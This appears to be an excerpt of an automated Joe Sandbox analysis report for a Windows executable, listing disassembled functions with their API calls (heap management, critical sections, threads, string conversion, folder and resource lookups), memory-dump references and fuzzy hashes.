String ID: RtlGetVersion$ntdll.dll
API String ID: 3137504439-1489217083
Opcode ID: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
Instruction ID: c27d50cfc24873b946f5b5a14a9105dc5d991450749eb0f504377b4d26b5710e
Opcode Fuzzy Hash: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
Instruction Fuzzy Hash: 14E0DF31B8461576C6202F75AC0AFCB2AEDCFC6B41B18043AF101F31D5DA38CA418ABD

Function 0040A6C3 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040A72B
HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?,00403C0E), ref: 0040A741
wcscpy.MSVCRT ref: 0040A74C
memset.MSVCRT ref: 0040A77A

Strings

$0A, xrefs: 0040A6FC

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocHeapmemsetwcscpywcslen
String ID: $0A
API String ID: 1807340688-513306843
Opcode ID: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
Instruction ID: e32262bd00c92b68ef8260e1fb7dc13a688965226c4dfc8bf1af71259570edab
Opcode Fuzzy Hash: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
Instruction Fuzzy Hash: 3C214872100B01AFC321AF159881B6BB7F9EF88314F14893FF58563691CB79E8258B1A

Function 0040A460 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0

HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A51C

Strings

$0A, xrefs: 0040A507

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Heap$Free$Alloc
String ID: $0A
API String ID: 3901518246-513306843
Opcode ID: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
Instruction ID: cd652e3bdf182b70a5213d1d771de0a97fad45979f4c99c471b58853275527fc
Opcode Fuzzy Hash: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
Instruction Fuzzy Hash: F4216AB1600716BFD3108F2ADC01B46BBE4FB4C700F41812EB508E76A1DB70E964CB99

Function 0040548C Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02499760), ref: 004054A5
EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA

Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB

LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
String ID:
API String ID: 3708593966-0
Opcode ID: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
Instruction ID: 22802cd27a3f1ed093d1fd342325ad429a5e5b172653039cc62d2cb3277a330b
Opcode Fuzzy Hash: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
Instruction Fuzzy Hash: AD11C232148214BFC3115F69EC05AD7BBB9EF46752720843AF800972A0EB75A8818B68

Function 0040DFC6 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F

Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028

DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040E048
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040E057

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
Instruction ID: 55e4d48cd168304893741703cb98186ecc41a8d0b28d64f5ed6d9708d3a92668
Opcode Fuzzy Hash: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
Instruction Fuzzy Hash: 23116A71101611EFC720AF16DC08B97BBB9FF45301F15883EE50AA7AA1C779A855CFA8

Function 0040994F Relevance: 7.5, APIs: 6, Instructions: 31COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(02499760,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040995D
CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409968
CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409973
CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040997E
EnterCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409986
LeaveCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040999A

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CloseHandle$CriticalSection$EnterLeave
String ID:
API String ID: 10009202-0
Opcode ID: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
Instruction ID: e0bc3ded0607a690d6707024abf9d108a6c512657707c309f6689cc3689588ed
Opcode Fuzzy Hash: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
Instruction Fuzzy Hash: 35F0FE32004600ABD3226F25DC08BABB7B5BF91355F15883EE055615B0CB796896DF59

Function 00409698 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
Part of subcall function 0040E900: HeapReAlloc.KERNEL32(02490000,00000000,?,?), ref: 0040E967

GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
wcscmp.MSVCRT ref: 004096C2
memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA

Strings

\\?\, xrefs: 004096BA, 004096D4

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocFileHeapModuleNameValuememmovewcscmp
String ID: \\?\
API String ID: 3734239354-4282027825
Opcode ID: 33c17352ecf2d33e8b842fb82144003de2b1de4302be4aa3bf9866a4b196b950
Instruction ID: 45f2cbb32eb965b059acfe96771e330f3b1ba6a562bb2c4a442859e911d7a588
Opcode Fuzzy Hash: 33c17352ecf2d33e8b842fb82144003de2b1de4302be4aa3bf9866a4b196b950
Instruction Fuzzy Hash: 15F0E2B31002017AC2006777DC89CAB7BACEB853B4750093FF516E2491EA38D82486B8

Function 0040B8B6 Relevance: 6.3, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B957
memset.MSVCRT ref: 0040B960
memset.MSVCRT ref: 0040B969
memset.MSVCRT ref: 0040B976
memset.MSVCRT ref: 0040B982

Part of subcall function 0040CCB6: memcpy.MSVCRT(?,?,00000040,?,?,?,?,?,?,?,?,?,00000000,?,0040B8F5,?), ref: 0040CD10
Part of subcall function 0040CCB6: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040B8F5,?), ref: 0040CD5F

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
Instruction ID: 1965f6ec6392bd57460d2593cd94e0dced67690f07481f5a959be489f1b8959c
Opcode Fuzzy Hash: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
Instruction Fuzzy Hash: FD21D6727507083BE524AA29DC86F9F738CDB41708F50063EF241B62C1DA79E54546AD

Function 00405BA0 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,?), ref: 00405C6A
wcsncpy.MSVCRT ref: 00405CC0

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocHeapwcsncpy
String ID:
API String ID: 2304708654-0
Opcode ID: a90f3be50ee59ad9f9cb2c8344752c2d6c44559da06bb1932963a8c5f4cf1607
Instruction ID: c5f2f283d94cb2b95ca38a154dbf8d05cc6d7144c7ec2ede7a16228095844b4d
Opcode Fuzzy Hash: a90f3be50ee59ad9f9cb2c8344752c2d6c44559da06bb1932963a8c5f4cf1607
Instruction Fuzzy Hash: F751BD34508B059BDB209F28D844A6B77F4FF84348F544A2EFC85A72D0E778E955CB89

Function 00406670 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406696
CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066D0
CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066FF
CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406705

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
Instruction ID: f3574eb3d9009b883351c62f390b1b458f0f5c76b551c27569f8cb84250b8306
Opcode Fuzzy Hash: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
Instruction Fuzzy Hash: 0E2157796043158BC710EF5D9C40077B3A0EF80765F86887BFC85A3380DA39EE169BA9

Function 00412840 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D738,00000000), ref: 00412874
malloc.MSVCRT ref: 00412884
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 004128A1
malloc.MSVCRT ref: 004128B6

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
Instruction ID: e0c8a2120d9564889d2f3113141632f921e3b611a2b6a27c47ae7c2ad602c93a
Opcode Fuzzy Hash: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
Instruction Fuzzy Hash: 9E01453B34130127E3206699AC12FB73B59CB81B95F19017AFB009E2C0D6F3A80082B9

Function 004128E0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412911
malloc.MSVCRT ref: 00412921
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041293B
malloc.MSVCRT ref: 00412950

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
Instruction ID: 3026177615c0ccb99804f522c9f73c57bab6efbcd972e36018b7209c0027a648
Opcode Fuzzy Hash: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
Instruction Fuzzy Hash: AB01F57734534127E3205699AD42FA77B59CB81BA5F19007AFB01AE2C0DAF7681086B8

Function 0040AFEC Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderLocation.SHELL32(00000000,02499760,00000000,00000000,00000000,00000000,00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?), ref: 0040AFFE
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040B00F
wcslen.MSVCRT ref: 0040B01A
CoTaskMemFree.OLE32(00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000), ref: 0040B038

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: FolderFreeFromListLocationPathTaskwcslen
String ID:
API String ID: 4012708801-0
Opcode ID: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
Instruction ID: ea6acf64d2064cc2033e367344890d06019be10827a432285197bb32926cdf71
Opcode Fuzzy Hash: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
Instruction Fuzzy Hash: BBF08136500615BAC7205F6ADC0DDAB7B7CEF15BA07404226F805E6260E7319910D7E8

Function 00405430 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004053E4: EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 004053EF
Part of subcall function 004053E4: LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405422

TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040546C

Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB

LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
String ID:
API String ID: 85618057-0
Opcode ID: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
Instruction ID: 2660d4446155f5fb089545407d2c8513ff3ad75f9eb032afb91e50ebd33cab77
Opcode Fuzzy Hash: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
Instruction Fuzzy Hash: 05F0E233404610FBC6205B619C49EE77779EF55767724883FF94172291CB386841CE6D

Function 004099C7 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CurrentHandleProcess$CloseDuplicate
String ID:
API String ID: 1410216518-0
Opcode ID: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
Instruction ID: ce6dac3176af70590056e0be6dcfbc27d6d18e8bdc9d520293d6dd9450c8e6f1
Opcode Fuzzy Hash: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
Instruction Fuzzy Hash: 73E0ED75608209BFEB10DF91DC49F9ABB7DEB44741F104065F905D2660EB71AD11CB64

Function 00402FAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02490000,00000000,?), ref: 0040E599

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02490000,00000000,?,?), ref: 0040E5BC

Part of subcall function 00402E49: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402E71
Part of subcall function 00402E49: __fprintf_l.LIBCMT ref: 00402ECB

Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
Part of subcall function 00409355: memset.MSVCRT ref: 00409381
Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0

Part of subcall function 00403E37: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A0D,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403E67

